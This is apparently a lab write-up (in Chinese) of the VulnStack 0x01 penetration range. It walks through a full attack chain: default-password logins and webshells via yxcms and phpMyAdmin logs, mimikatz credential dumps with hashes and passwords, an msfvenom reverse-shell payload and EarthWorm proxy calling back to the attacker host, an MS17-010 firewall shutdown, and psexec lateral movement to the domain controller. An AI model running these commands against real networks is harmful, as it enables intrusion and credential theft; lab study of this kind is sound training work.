VulnStack 0x01
学习于 :
基本信息
name | host | password | 说明 |
---|---|---|---|
win7 | 192.168.52.143 | 192.168.21.145 | xzasLXR1 | WEB服务器 |
win2k3 | 192.168.52.141 | xzasLXR1 | 域成员 |
win2008 | 192.168.52.138 | xzas@157 | 域控服务器 |
kali | 192.168.21.129 | attack |
win 7
webshell
result of dirsearch
/yxcms
/phpmyAdmin
/phpMyAdmin
教训:好字典的重要性,要死就是没找到合适的字典,算了 直接将yxcms加到字典里吧www
yxcms
- 访问 yxcms
在右下角form中有提示
/index.php?r=admin进入。 后台的用户名:admin;密码:123456,请进入后修改默认密码。
- 访问后台
http://192.168.21.145/yxcms/index.php?r=admin
username | password |
---|---|
admin | 123456 |
- webshell
利用修改页面功能写webshell
还是喜欢用AntSword
phpmyadmin
访问 phpmyAdmin
使用默认密码
username | password |
---|---|
root | root |
getshell的常见方式:
1、select into outfile直接写入
2、开启全局日志getshell
3、使用慢查询日志getsehll
4、使用错误日志getshell
5、利用phpmyadmin4.8.x本地文件包含漏洞getshell
- 查看secure_file_priv


注意secure_file_priv为只读
-
采用日志的方法
-
- 查看权限
show global variables like "%genera%";
varname value Variable_name Value general_log OFF general_log_file C:\phpStudy\MySQL\data\stu1.log - 修改权限与Log文件地址
set global general_log='ON'; set global general_log_file='C:/phpStudy/WWW/fe1w0.php'; select '';




信息收集
发现Antwork 在返回信息时,有时会BUG
基本点
本机信息收集
命令名 | 说明 |
---|---|
net view | 获取当前组的计算机名,查看同一域/工作组的计算机列表 |
net user | 用户信息的查询 |
query user || qwinsta |
查询当前在线用户 |
net localgroup administrators | 查询本地管理员组信息,通常那个域内机器会包含一些域内的信息 |
ipconfig /all | 查询网络配置信息,判断是否有域的话可以根据DNS的后缀 |
nslookup | 通过反向解析查询命令nslookup 来解析域名的IP 地址。使用解析出来的IP地址进 行对比,判断域控制器和DNS 服务器是否在同一台服务器上 dig |
systeminfo | 获取系统信息 |
tasklist | 查询进程信息,用来查看需要是否存在杀软之类的 |
netstat -ano | 查看端口信息 |
还有其他常用命令
详情:
C:\tmp> net localgroup administrators
别名 administrators
注释 管理员对计算机/域有不受限制的完全访问权
成员
-------------------------------------------------------------------------------
Administrator
GOD\Domain Admins
liukaifeng01
命令成功完成。
C:\tmp> systeminfo
主机名: STU1
OS 名称: Microsoft Windows 7 专业版
OS 版本: 6.1.7601 Service Pack 1 Build 7601
OS 制造商: Microsoft Corporation
OS 配置: 成员工作站
OS 构件类型: Multiprocessor Free
注册的所有人: Windows 用户
域
域信息收集
-
whoami /all
查询域SID -
net user test1 /domain
查询当前指定账户的详细信息 -
net config workstation
查询当前登录域及登录用户信息 -
net time /domain
一般会有三种情况:
存在域,但当前用户不是域用户,提示说明权限不够
存在域,并且当前用户是域用户
当前网络环境为工作组,不存在域
net group "Domain Controllers" /domain
查找域控
也可以采用 WMIC脚本来收集
http://www.fuzzysecurity.com/scripts/files/wmic_info.rar
探测域内其他主机
这里使用arp扫描 和nbtscan来收集域内信息
arp-scan_64.exe -t 192.168.52.1/20 >1.txt
Reply that 00:0C:29:86:6F:BA is 192.168.52.138 in 15.289000
Reply that 00:0C:29:2A:99:BC is 192.168.52.141 in 16.001900
Reply that 00:0C:29:A3:B3:2A is 192.168.52.143 in 0.040600
Reply that 00:0C:29:A3:B3:2A is 192.168.52.255 in 0.048100
C:\tmp> nbtscan-1.0.35.exe 192.168.52.0/24 >z.txt
*timeout (normal end of scan)
192.168.52.138 GOD\OWA SHARING DC
192.168.52.141 GOD\ROOT-TVI862UBEH SHARING
192.168.52.143 GOD\STU1 SHARING
ip | 说明 |
---|---|
192.168.52.138 | DC |
192.168.52.141 | 域内其他机器 |
192.168.52.143 | 当前机器win7 |
本机密码
上传mimikatz
注意此处最好先用nc反弹cmd.exe,在ANTSword有可能看不到回显
mimikatz.exe "privilege::debug" "log" "sekurlsa::logonpasswords" "exit" > log.log
Authentication Id : 0 ; 2568929 (00000000:002732e1)
Session : Interactive from 1
User Name : Administrator
Domain : GOD
Logon Server : OWA
Logon Time : 2020/5/9 15:01:10
SID : S-1-5-21-2952760202-1353902439-2381784089-500
msv :
[00000003] Primary
- Username : Administrator
- Domain : GOD
- LM : 1121a434316e2b1ec2265b23734e0dac
- NTLM : b8529ce2d4fa8ba1adc67295abefe12e
- SHA1 : 11540fad9cb5ed35fe7f599aef2b0fa58c0fdec4
tspkg :- Username : Administrator
- Domain : GOD
- Password : xzasLXR1
关闭防火墙
进入内网
制作木马后门
#kali
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.21.129 lport=23333 -f exe > /root/Desktop/reverse_tcp.exe
将木马上传到win7并执行。


kali msf监听
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 192.168.21.129
LHOST => 192.168.21.129
msf5 exploit(multi/handler) > set LPORT 23334
LPORT => 23334
msf5 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.21.129:23334
[*] Sending stage (206403 bytes) to 192.168.21.145
[*] Meterpreter session 1 opened (192.168.21.129:23334 -> 192.168.21.145:7746) at 2020-05-09 10:02:12 -0400
meterpreter > pwd
C:\tmp
meterpre
代理
但为了kali 能直接访问内网,我们还需开启代理
祭出 橙色神器 Earthworm
反弹 SOCKS v5 服务器
同样需要先上传ew_for_Win.exe到边界机
- kali
修改proxychains文件
文件地址 /etc/proxychains.conf
修改为
[ProxyList]
# add proxy here ...
# meanwile
# defaults set to "tor"
#socks4 127.0.0.1 9050
#socks5 192.168.21.144 1080
socks5 127.0.0.1 1080
监听1080端口
./ew_for_linux64 -s rcsocks -l 1080 -e 8888
- win7
ew_for_Win.exe -s rssocks -d 192.168.21.129 -e 8888
代理msf


扫描端口
msf5 > use scanner/portscan/tcp
msf5 auxiliary(scanner/portscan/tcp) > set RHOSTS 192.168.52.138 192.168.52.141
RHOSTS => 192.168.52.138 192.168.52.141
msf5 auxiliary(scanner/portscan/tcp) > set PORTS 3389,139,445,80,8080,21
PORTS => 3389,139,445,80,8080,21
msf5 auxiliary(scanner/portscan/tcp) > set threads 65
threads => 65
msf5 auxiliary(scanner/portscan/tcp) > run
|S-chain|-<>-127.0.0.1:1080-<><>-192.168.52.138:21-|S-chain|-<>-127.0.0.1:1080-<><>-192.168.52.138:139-|S-chain|-<>-127.0.0.1:1080-<><>-192.168.52.138:80-|S-chain|-<>-127.0.0.1:1080-<><>-192.168.52.138:445-|S-chain|-<>-127.0.0.1:1080-<><>-192.168.52.138:8080-|S-chain|-<>-127.0.0.1:1080-<><>-192.168.52.141:139-|S-chain|-<>-127.0.0.1:1080-<><>-192.168.52.141:21-|S-chain|-<>-127.0.0.1:1080-<><>-192.168.52.138:3389-|S-chain|-<>-127.0.0.1:1080-<><>-192.168.52.141:8080-|S-chain|-<>-127.0.0.1:1080-<><>-192.168.52.141:445-|S-chain|-<>-127.0.0.1:1080-<><>-192.168.52.141:3389-|S-chain|-<>-127.0.0.1:1080-<><>-192.168.52.141:80-<><>-OK
[+] 192.168.52.138: - 192.168.52.138:139 - TCP OPEN
<><>-OK
[+] 192.168.52.138: - 192.168.52.138:80 - TCP OPEN
<><>-OK
[+] 192.168.52.138: - 192.168.52.138:445 - TCP OPEN
<><>-OK
[+] 192.168.52.141: - 192.168.52.141:139 - TCP OPEN
<><>-OK
[+] 192.168.52.141: - 192.168.52.141:21 - TCP OPEN
<><>-OK
[+] 192.168.52.141: - 192.168.52.141:445 - TCP OPEN
<--timeout
<--timeout
<--timeout
<--timeout
<--timeout
<--timeout
[*] Scanned 1 of 2 hosts (50% complete)
[*] Scanned 2 of 2 hosts (100% complete)
[*] Auxiliary module execution completed
MS17-010
https://docs.microsoft.com/zh-cn/security-updates/securitybulletins/2017/ms17-010
scan
msf5 auxiliary(scanner/portscan/tcp) > use auxiliary/scanner/smb/smb_ms17_010
msf5 auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 192.168.52.141 192.168.52.138
RHOSTS => 192.168.52.141 192.168.52.138
msf5 auxiliary(scanner/smb/smb_ms17_010) > run
|S-chain|-<>-127.0.0.1:1080-<><>-192.168.52.141:445-<><>-OK
|S-chain|-<>-127.0.0.1:1080-<><>-192.168.52.141:135-<><>-OK
[+] 192.168.52.141:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2003 3790 x86 (32-bit)
[*] Scanned 1 of 2 hosts (50% complete)
|S-chain|-<>-127.0.0.1:1080-<><>-192.168.52.138:445-<><>-OK
|S-chain|-<>-127.0.0.1:1080-<><>-192.168.52.138:135-<><>-OK
[+] 192.168.52.138:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Datacenter 7601 Service Pack 1 x64 (64-bit)
[*] Scanned 2 of 2 hosts (100% complete)
[*] Auxiliary module execution completed
msf5 auxiliary(scanner/smb/smb_ms17_010) >
exploit – Error
msf5 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue
msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.52.138
RHOSTS => 192.168.52.138
msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/bind_tcp
payload => windows/x64/meterpreter/bind_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) > show options
但失败
Auxiliary module – 关闭防火墙
msf5 exploit(windows/smb/ms17_010_eternalblue) > use auxiliary/admin/smb/ms17_010_command
msf5 auxiliary(admin/smb/ms17_010_command) > set RHOSTS 192.168.52.138
RHOSTS => 192.168.52.138
msf5 auxiliary(admin/smb/ms17_010_command) > set COMMAND netsh advfirewall set allprofiles state off
COMMAND => netsh advfirewall set allprofiles state off
msf5 auxiliary(admin/smb/ms17_010_command) > run
之后再次exploit


Error还是有可能会报的,而且贼不稳
可以使用进程迁移 run post/windows/manage/migrate
,但效果平平,还是任意死,感觉是代理的锅。
mimikatz
之后可以利用mimikatz来获取密码
r8要先登录,能正常使用
meterpreter > wdigest
[+] Running as SYSTEM
[*] Retrieving wdigest credentials
wdigest credentials
===================
AuthID Package Domain User Password
------ ------- ------ ---- --------
0;45394 NTLM
0;995 Negotiate NT AUTHORITY IUSR
0;997 Negotiate NT AUTHORITY LOCAL SERVICE
0;996 Negotiate GOD OWA$ 23 25 9c f9 6d 81 30 d0 bf a5 99 d8 50 78 6d 69 c7 ba 82 c0 5a f5 1d 44 ee ec 10 e3 c9 14 87 0f 75 28 ea 63 6a 61 1f 81 35 28 fa 93 cf 7d ea 98 7c d9 09 1b e4 86 96 82 a5 2a fc 52 c1 33 ba 19 54 88 0f 5d f2 30 ac 26 97 55 33 f8 4f 61 58 52 c3 b2 3f 3b 8d b2 4d 19 3d 76 d9 ba a5 a8 26 94 96 a0 dc 86 37 30 a5 bf 6a 2a 92 2c 1e 08 a5 4b 9a 4d 9e d7 85 1a 36 07 55 d8 34 5b 47 58 21 43 34 17 d2 0a 74 9a 52 a4 9f 76 9e 25 0a f0 df ea 9e 34 7d c1 87 e2 9a 10 8e 06 cf a8 be 91 b0 35 09 bb cb db 51 6d 8d 0d ce 5b d5 40 9a 08 30 d5 29 d5 4f b7 c7 9b ab 4c 06 59 d9 0b 2f d7 fa 2d 07 4f 7d 62 a1 c9 97 74 61 bb c5 e3 a1 95 19 6e a9 8a 4d a1 3a 1a fa 09 cb 57 3e 0b 4e b1 fc eb 22 d0 07 05 97 a2 a2 aa d9 69 67 70 53 0e 37 92
0;999 Negotiate GOD OWA$ 23 25 9c f9 6d 81 30 d0 bf a5 99 d8 50 78 6d 69 c7 ba 82 c0 5a f5 1d 44 ee ec 10 e3 c9 14 87 0f 75 28 ea 63 6a 61 1f 81 35 28 fa 93 cf 7d ea 98 7c d9 09 1b e4 86 96 82 a5 2a fc 52 c1 33 ba 19 54 88 0f 5d f2 30 ac 26 97 55 33 f8 4f 61 58 52 c3 b2 3f 3b 8d b2 4d 19 3d 76 d9 ba a5 a8 26 94 96 a0 dc 86 37 30 a5 bf 6a 2a 92 2c 1e 08 a5 4b 9a 4d 9e d7 85 1a 36 07 55 d8 34 5b 47 58 21 43 34 17 d2 0a 74 9a 52 a4 9f 76 9e 25 0a f0 df ea 9e 34 7d c1 87 e2 9a 10 8e 06 cf a8 be 91 b0 35 09 bb cb db 51 6d 8d 0d ce 5b d5 40 9a 08 30 d5 29 d5 4f b7 c7 9b ab 4c 06 59 d9 0b 2f d7 fa 2d 07 4f 7d 62 a1 c9 97 74 61 bb c5 e3 a1 95 19 6e a9 8a 4d a1 3a 1a fa 09 cb 57 3e 0b 4e b1 fc eb 22 d0 07 05 97 a2 a2 aa d9 69 67 70 53 0e 37 92
0;329096 Kerberos GOD liukaifeng01 xzas@157
0;329127 Negotiate GOD liukaifeng01 xzas@157
exploit – success
msf5 exploit(windows/smb/ms17_010_eternalblue) > use exploit/windows/smb/psexec
msf5 exploit(windows/smb/psexec) > set RHOSTS 192.168.52.138
RHOSTS => 192.168.52.138
msf5 exploit(windows/smb/psexec) > set SMBDomain god.org
SMBDomain => god.org
msf5 exploit(windows/smb/psexec) > set SMBUSER liukaifeng01
SMBUSER => liukaifeng01
msf5 exploit(windows/smb/psexec) > set SMBPASS xzas@157
SMBPASS => xzas@157
msf5 exploit(windows/smb/psexec) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf5 exploit(windows/smb/psexec) > set LPORT 8553
LPORT => 8553


比之前稳定多了
CobaltStrike
官网
link : https://www.cobaltstrike.com
B站 上有前辈翻译视频
link : https://www.bilibili.com/video/BV1S7411k7pU/
u1s1 B站上只要关注合天他们,基本上B站关于信安的视频和up ,你都会知道
其他学习link:
待尝试cs4.0
后记
啊啊啊 好多还不会,这个实践完
好好学习《内网安全攻防》
难顶,比赛结束再录视频吧
难顶,比赛结束再录视频吧